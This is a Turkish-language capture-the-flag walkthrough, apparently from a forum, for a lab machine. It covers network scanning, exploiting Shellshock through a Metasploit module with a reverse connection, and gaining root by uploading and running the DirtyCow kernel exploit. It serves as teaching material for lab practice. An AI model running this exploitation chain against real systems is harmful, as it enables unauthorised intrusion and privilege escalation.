İndirme linki: Sitemizdeki linkleri görmek için ÜYE olmalısınız.

Network Tarama

Netdiscover kullanarak hedef makine için ağımızı tarayarak başlıyoruz.

Kod:
netdiscover

Sitemizdeki linkleri görmek için ÜYE olmalısınız.

Hedef makine "192.168.1.104"de aktifmiş. IP'yi Nmap taramasından geçirelim ve çalışan servisleri ve açık portları var mı diye bakalım.

Kod:
nmap -p- -A 192.168.1.104

Sitemizdeki linkleri görmek için ÜYE olmalısınız.

Enumeration

Tarama işlemi bize iyi ve kullanışlı bir çok bilgi verdi lakin göze çarpanlar açık olan 22 ve 80 portlar oldu. Araştırmaya 80 portundan başlayalım ve orada neler bulabileceğimize bakalım.

Sitemizdeki linkleri görmek için ÜYE olmalısınız.

Bu sayfadan pek bir şey çıkacak gibi gözükmüyor. En iyisi Nikto tarama yapalım ve sayfayı daha fazla kavramaya çalışalım.

Kod:
nikto -h Sitemizdeki linkleri görmek için ÜYE olmalısınız.

Nikto taramaları, uygulamada "/cgi-bin/" dizinini arar. İleri bir kontrolde uygulamada shellshock'a karşı açık olduğunu gördük. Exploit'leme zamanı.

Sitemizdeki linkleri görmek için ÜYE olmalısınız.

Exploit'leme

Terminal açıp Métasploit framework'ü yüklemek için msfconsole yazalım ve aşağıdaki modülü kullanalım. Bu modül, HTTP_USER_AGENT çevre değişkenini kötücül bir fonksiyon tanımına ayarlayarak Apache webserver'daki CGI script'lerini hedefler.

Kod:
use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf exploit(apache_mod_cgi_bash_env_exec) >set rhost 192.168.1.104
msf exploit(apache_mod_cgi_bash_env_exec) >set lhost 192.168.1.112
msf exploit(apache_mod_cgi_bash_env_exec) >set targeturi /cgi-bin/test
msf exploit(apache_mod_cgi_bash_env_exec) >expoit

Sitemizdeki linkleri görmek için ÜYE olmalısınız.

Makinenin işletim sistemini öğrenmek için sysinfo komutunu çalıştırdık ve Ubuntu 12.04 olduğunu öğrendik. Bu tip eski sistemlerin genelde zafiyetli kernelleri olur. DIRTYCOW denemeliyiz.

Ayrıcalık Yükseltme

Exploit'i host makinenin içine indirdim ve sonrasında exploit'i çalıştırmadan evvel derledim. Şimdi şu komut lazım:

Kod:
gcc -pthread c0w.c -o c0w

Sitemizdeki linkleri görmek için ÜYE olmalısınız.

Sonrasında o remote shell'deki derlenmiş dosyayı root almak için yükledik.

Kod:
cd /tmp
upload /root/c0w .
./c0w

Sitemizdeki linkleri görmek için ÜYE olmalısınız.

Oluşturulan shell ayrıcalıkları yükselticek. Root bayrağını okumak için, bu shell'i düzgün bir shell'e dönüştüreceğiz. Sonrasında Dirty Cow exploit tarafından oluşturulan dosyaları kullanıp root olarak giriş yapacağız.

Kod:
shell
python -c 'import pty; pty.spawn("/bin/sh")
./c0w
/usr/bin/passwd
cd /root
cat root.txt

Böylelikle bayrağımızı yakalamış oluruz.

Sitemizdeki linkleri görmek için ÜYE olmalısınız.